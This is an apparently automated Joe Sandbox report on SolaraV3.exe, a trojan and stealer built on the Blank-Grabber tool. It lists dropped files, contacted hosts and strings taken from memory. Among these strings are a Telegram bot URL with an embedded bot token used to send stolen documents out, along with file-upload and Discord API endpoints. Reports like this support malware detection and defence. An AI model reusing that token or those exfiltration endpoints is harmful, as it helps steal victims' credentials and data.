IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SolaraV3.exe	55%	ReversingLabs	Win64.Trojan.Generic

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\libffi-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
ip-api.com	208.95.112.1	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
blank-a0m8c.in	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument	true

URLs from Memory and Binaries

Name	Source	Malicious
https://duckduckgo.com/chrome_newtab	SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Blank-c/BlankOBF	SolaraV3.exe, 00000002.00000003.1576344142.000001FC253B0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1576939508.000001FC253B0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1576455903.000001FC2577A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1576808435.000001FC253B0000.00000004.00000020.00020000.00000000.sdmp	false
https://api.telegram.org/bot%s/%s	SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	false
https://www.avito.ru/	SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	SolaraV3.exe	false
https://github.com/Blank-c/Blank-Grabberi	SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ctrip.com/	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	SolaraV3.exe	false
https://python.org/dev/peps/pep-0263/	SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp	false
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
https://www.leboncoin.fr/	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc2388#section-4.4	SolaraV3.exe, 00000002.00000002.2038113836.000001FC24E70000.00000004.00000020.00020000.00000000.sdmp	false
https://weibo.com/	SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	false
https://api.anonfiles.com/upload	SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp	false
https://www.msn.com	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.1785679390.00000267B9182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E80DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F6919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmp	false
https://discord.com/api/v9/users/	SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmp	false
https://www.reddit.com/	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000E.00000002.1728980230.00000267A9111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E6761000.00000004.00000800.00020000.00000000.sdmp	false
https://www.amazon.ca/	SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK	SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp	false
https://www.ebay.co.uk/	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000E.00000002.1728980230.00000267A9338000.00000004.00000800.00020000.00000000.sdmp	false
https://www.ebay.de/	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
https://go.micro	powershell.exe, 0000004A.00000002.1847941368.00000239E7395000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
https://www.amazon.com/	SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B6C000.00000004.00001000.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmp	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	false
https://httpbin.org/	SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.ver)	svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr	false
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ecosia.org/newtab/	SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	SolaraV3.exe, 00000002.00000003.1770391926.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1707803030.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1725691651.000001FC25641000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1700886273.000001FC2559D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1742788429.000001FC2530F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmp	false
https://www.youtube.com/	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
https://allegro.pl/	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmp	false
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
https://MD8.mozilla.org/1/m	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0$	SolaraV3.exe	false
https://www.bbc.co.uk/	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod1C:	qmgr.db.26.dr	false
http://ip-api.com/line/?fields=hostingr	SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	false
https://bugzilla.mo	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
http://tools.ietf.org/html/rfc6125#section-6.4.3	SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmp	false
https://api.telegram.org/bot%s/%s)	SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000E.00000002.1728980230.00000267A9338000.00000004.00000800.00020000.00000000.sdmp	false
http://logo.veWALLET~2.JS	SolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmp	false
https://google.com/mail	SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039868154.000001FC253B7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmp	false
http://logo.veANIFE~1JSO	SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp	false
https://packaging.python.org/specifications/entry-points/	SolaraV3.exe, 00000002.00000002.2043602926.000001FC25980000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
http://logo.ve	SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/	SolaraV3.exe, 00000002.00000002.2043751241.000001FC25B08000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
https://www.iqiyi.com/	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
https://foss.heptapod.net/pypy/pypy/-/issues/3539	SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com/	SolaraV3.exe, 00000002.00000003.1769191684.000001FC253DF000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC253E4000.00000004.00000020.00020000.00000000.sdmp	false
https://api.gofile.io/getServerr	SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	SolaraV3.exe, rar.exe.1.dr	false
http://logo.veW	SolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org/download/releases/2.3/mro/.	SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.1.dr	false
https://contoso.com/License	powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmp	false
https://discordapp.com/api/v9/users/	SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
http://ip-api.com/json/?fields=225545r	SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	SolaraV3.exe	false
https://github.com/urllib3/urllib3/issues/2920	SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr	false
http://crl.sectigo.j$	SolaraV3.exe, 00000001.00000002.2058209847.000001EA23108000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmp	false
https://yahoo.com/	SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039868154.000001FC253B7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmp	false
https://account.bellmedia.c	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	false
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp	false
https://login.microsoftonline.com	SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmp	false
http://cacerts.digicert.co	SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.thawte.com/ThawteTimestampingCA.crl0	SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.dr	false
https://html.spec.whatwg.org/multipage/	SolaraV3.exe, 00000002.00000002.2039868154.000001FC25370000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ifeng.com/	SolaraV3.exe, 00000002.00000002.2042112590.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772579209.000001FC25648000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1736269912.000001FC25649000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770391926.000001FC25646000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmp	false
https://www.zhihu.com/	SolaraV3.exe, 00000002.00000003.1769191684.000001FC25569000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmp	false
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmp	false
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	SolaraV3.exe, 00000002.00000003.1708990356.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252A7000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036193521.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038759505.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921057827.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC25299000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1770986223.000001FC2527D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252A2000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252A3000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmp	false
https://oneget.orgX	powershell.exe, 0000004A.00000002.1847941368.00000239E7EDA000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/Unidata/MetPy/bl	SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	true
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525849
Start date and time:	2024-10-04 15:30:51 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	127
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SolaraV3.exe
Detection:	MAL
Classification:	mal100.rans.troj.adwa.spyw.expl.evad.winEXE@199/58@4/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 95% Number of executed functions: 132 Number of non-executed functions: 194
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe
Excluded IPs from analysis (whitelisted): 142.250.185.131, 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, login.live.com, e16604.g.akamaiedge.net, gstatic.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target mshta.exe, PID 6484 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 5736 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6044 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SolaraV3.exe

Simulations

Behavior and APIs

Time	Type	Description
09:32:18	API Interceptor	7x Sleep call for process: WMIC.exe modified
09:32:20	API Interceptor	166x Sleep call for process: powershell.exe modified
09:32:23	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
